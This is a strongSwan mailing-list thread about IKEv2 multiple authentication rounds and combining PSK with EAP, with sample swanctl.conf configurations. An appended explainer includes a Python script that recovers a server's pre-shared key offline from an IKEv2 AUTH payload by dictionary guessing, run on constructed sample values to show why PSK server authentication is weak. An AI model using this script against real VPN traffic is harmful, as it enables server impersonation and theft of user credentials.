[strongSwan] Multiple Authentication Rounds
Christian Salway
2018-07-17 16:05:33 UTC
Hello,

To quote your page [1] "With IKEv2 it is possible to use multiple authentication rounds", could this be PSK and eap-mschapv2 and do you have a configuration that would match that method? My current configuration looks like the below.

The clients are OSX and Windows native clients so I am curious if it will work.

connections {
    radius {
        version = 2
        send_cert = always
        encap = yes
        pools = pool1
        unique = replace
        proposals = aes256-sha256-prfsha256-ecp256-modp2048
        local {
            # the id must be contained in the certificate, either as subject or as subjectAltName.
            id = ${FQDN}
            certs = cert.pem
        }
        remote {
            auth = eap-radius
            eap_id = %any
        }
        children {
            child_sa_1 {
                #esp_proposals =
                local_ts = ${LOCALCIDR}
            }
        }
    }
}



[1] https://wiki.strongswan.org/projects/strongswan/wiki/IntroductiontostrongSwan#Authentication-Basics

Kind regards,

Christian Salway
IT Consultant - Naimuri

T: +44 7463 331432
E: ***@naimuri.com
A: Naimuri Ltd, Capstan House, Manchester M50 2UW
Emanuil Hristov
2018-07-17 18:29:58 UTC
Hello there,
I don't know about the macOS client, but surely the Windows native client will not work.
Here is an example configuration, PSK + EAP-MSCHAPv2 with RADIUS.
This works with the iOS native client.
---
vpn-pskeap {
    local_addrs = $$locaip

    local {
        auth = psk
        id = $$leftid
    }

    remote {
        auth = eap-radius
    }

    children {
        vpn-pskeap {
            local_ts = 0.0.0.0/0
            # per-child options: in swanctl.conf these belong inside the
            # child section, not directly under children
            updown = /usr/lib/ipsec/_updown iptables
            esp_proposals = aes128-aes192-aes256-sha1-sha256-sha384-sha512-ecp256-ecp384-ecp521-modp2048-modp3072-modp4096-modp1024
            dpd_action = clear
            close_action = clear
            ipcomp = yes
        }
    }

    version = 2
    proposals = aes128-aes192-aes256-sha1-sha256-sha384-sha512-ecp256-ecp384-ecp521-modp2048-modp3072-modp4096-modp1024
    # swanctl.conf has no ike_lifetime; the IKE_SA rekey interval is rekey_time
    rekey_time = 45m
    mobike = yes
    fragmentation = yes
    encap = yes
    # dpd_timeout is only used by IKEv1; IKEv2 relies on the retransmission timeout
    dpd_timeout = 60
    dpd_delay = 25
    unique = never
    pools = radius
}
Christian Salway
2018-07-17 21:09:53 UTC
Mmm ok, thanks. I can’t see that being configured for OSX either.
Tobias Brunner
2018-07-18 13:56:24 UTC
Hi Christian,
Post by Christian Salway
To quote your page [1] "With IKEv2 it is possible to use multiple
authentication rounds"
This refers to using multiple authentication rounds per RFC 4739 [1].
There aren't that many implementations that support it (i.e. neither
Windows nor macOS does).
Post by Christian Salway
could this be PSK and eap-mschapv2
Theoretically yes, but combining PSK with EAP isn't strictly compliant
with RFC 7296, according to which [2] the server has to be authenticated
with a pubkey based authentication. The problem is that using a shared
PSK to authenticate the server allows active attackers that know it - if
the PSK is weak they could even find it by connecting to the server and
then attacking the AUTH payload offline - to impersonate the server and
get potentially weak EAP password hashes from clients.

By the way, using PSK authentication for the server and EAP
authentication for the client (like Emanuil does) is not using multiple
authentication rounds (it just uses a PSK instead of a certificate to
authenticate the server). With multiple authentication rounds the first
round would authenticate both client and server with a PSK and then the
EAP authentication would follow (but that doesn't really improve the
overall security, in particular if the same PSK is used for client and
server or the client PSKs are weak). Multiple authentication rounds are
more intended e.g. to first authenticate the client device with a
machine certificate (and the server with its certificate) and then do a
user authentication based on EAP in the second round.
Post by Christian Salway
The clients are OSX and Windows native clients so I am curious if it will work.
No, as mentioned they don't support multiple IKEv2 authentication rounds.

Regards,
Tobias

[1] https://tools.ietf.org/html/rfc4739
[2] https://tools.ietf.org/html/rfc7296#section-2.16
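The layout Tobias describes (device authenticated with a machine certificate in the first round, user authenticated with EAP in the second) is expressed in swanctl.conf by giving a connection more than one `local`/`remote` section: every section named `local` or `remote` plus a unique suffix is one authentication round, taken in the order listed. The fragment below is an added example written for this page, not a configuration from the thread or from the strongSwan project; the connection and file names, the `${FQDN}`/`${LOCALCIDR}` placeholders (borrowed from the first post), the `-user` suffixes and the client identities are all assumptions.

```conf
# Server (responder) side, swanctl.conf
connections {
    rw-multi-auth {
        version = 2
        proposals = aes256-sha256-prfsha256-ecp256-modp2048
        pools = pool1
        encap = yes
        send_cert = always

        # The server always authenticates with its certificate; RFC 7296 2.16
        # requires public-key authentication of the responder when EAP is used.
        local {
            auth = pubkey
            certs = cert.pem
            id = ${FQDN}
        }

        # Round 1: the client device proves possession of a machine certificate
        # issued by the device CA (assumed file name).
        remote {
            auth = pubkey
            cacerts = device-ca.pem
            id = %any
        }

        # Round 2 (RFC 4739): the user authenticates with EAP, relayed to RADIUS.
        remote-user {
            auth = eap-radius
            eap_id = %any
        }

        children {
            net {
                local_ts = ${LOCALCIDR}
            }
        }
    }
}

# Client side (a strongSwan peer; the Windows and macOS native clients do not
# implement RFC 4739), with its own rounds in the same order.
connections {
    corp {
        version = 2
        remote_addrs = ${FQDN}
        vips = 0.0.0.0

        local {
            auth = pubkey
            certs = laptop.pem
            id = laptop.example.org
        }
        local-user {
            auth = eap-mschapv2
            eap_id = alice
        }
        remote {
            auth = pubkey
            id = ${FQDN}
        }

        children {
            net {
                remote_ts = ${LOCALCIDR}
            }
        }
    }
}
```

Note that this is a different thing from Emanuil's `local { auth = psk }` plus `remote { auth = eap-radius }`, which is a single round in which the server merely substitutes a PSK for its certificate. After loading with `swanctl --load-all`, `swanctl --list-conns` shows both remote rounds for the connection, which is the quickest check that the suffixed section was parsed as a second round rather than ignored.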
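Tobias's warning about a PSK-authenticated server can be made concrete. Below is an added example, written for this page (not code from the thread or from strongSwan), of the RFC 7296 section 2.15 computation the attacker would run: an initiator that connects to the server with any PSK of its own knows SK_pr (derived from the Diffie-Hellman exchange it took part in), its own nonce Ni, the server's IKE_SA_INIT response and the server's IDr, so the only unknown in the AUTH payload the server sends is the PSK, which can then be guessed offline. The prf is HMAC-SHA256 (the prfsha256 from the proposal in the first post); the message, nonce and SK_pr values are constructed stand-ins rather than captured traffic, and the server PSK and word list are made up.

```python
import hmac
import hashlib

# RFC 7296 section 2.15, shared-key authentication:
#   AUTH = prf( prf(Shared Secret, "Key Pad for IKEv2"), <SignedOctets> )
KEY_PAD = b"Key Pad for IKEv2"
ID_FQDN = 2  # ID type value, RFC 7296 section 3.5


def prf(key, data):
    """PRF_HMAC_SHA2_256, i.e. the prfsha256 negotiated by the proposal above."""
    return hmac.new(key, data, hashlib.sha256).digest()


def id_payload_body(id_type, id_data):
    """ID payload minus the generic payload header: type, three RESERVED bytes, data."""
    return bytes([id_type, 0, 0, 0]) + id_data


def responder_signed_octets(real_message2, nonce_i, sk_pr, idr_body):
    """ResponderSignedOctets = RealMessage2 | NonceIData | prf(SK_pr, RestOfRespIDPayload)."""
    return real_message2 + nonce_i + prf(sk_pr, idr_body)


def psk_auth(psk, signed):
    """AUTH payload data a responder sends when it authenticates with a PSK."""
    return prf(prf(psk, KEY_PAD), signed)


def recover_psk(observed_auth, signed, candidates):
    """Offline dictionary attack: the first candidate that reproduces the observed AUTH, else None."""
    for cand in candidates:
        if hmac.compare_digest(psk_auth(cand, signed), observed_auth):
            return cand
    return None


# --- constructed sample, not captured traffic ---
# The attacker ran IKE_SA_INIT as initiator with a PSK of its own choosing, so it
# picked Ni itself, derived SK_pr (and SK_er, to decrypt IKE_AUTH) from the DH
# exchange it took part in, and saw the server's IKE_SA_INIT response on the wire.
SERVER_PSK = b"Summer2018"  # weak secret behind local { auth = psk } on the server
REAL_MESSAGE_2 = b"<IKE_SA_INIT response bytes, constructed stand-in>"
NONCE_I = hashlib.sha256(b"constructed Ni").digest()
SK_PR = hashlib.sha256(b"constructed SK_pr").digest()
IDR_BODY = id_payload_body(ID_FQDN, b"vpn.example.org")
SIGNED = responder_signed_octets(REAL_MESSAGE_2, NONCE_I, SK_PR, IDR_BODY)
# What the server returns inside its IKE_AUTH response; computed here in place of a capture.
OBSERVED_AUTH = psk_auth(SERVER_PSK, SIGNED)

WORDLIST = [b"password", b"Welcome1", b"Summer2018", b"changeme"]


def demo():
    """Recover the server PSK from one observed AUTH payload and a short word list."""
    return recover_psk(OBSERVED_AUTH, SIGNED, WORDLIST)


if __name__ == "__main__":
    print(demo())
```

Once a weak PSK falls, the attacker can produce a valid AUTH of its own and stand up a rogue responder, which is exactly the position from which it collects EAP-MSCHAPv2 responses from clients. With `auth = pubkey` the AUTH is a signature under the server's private key and there is nothing to guess; if a PSK has to be used on the server at all, it must be long and random rather than a password-like string.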
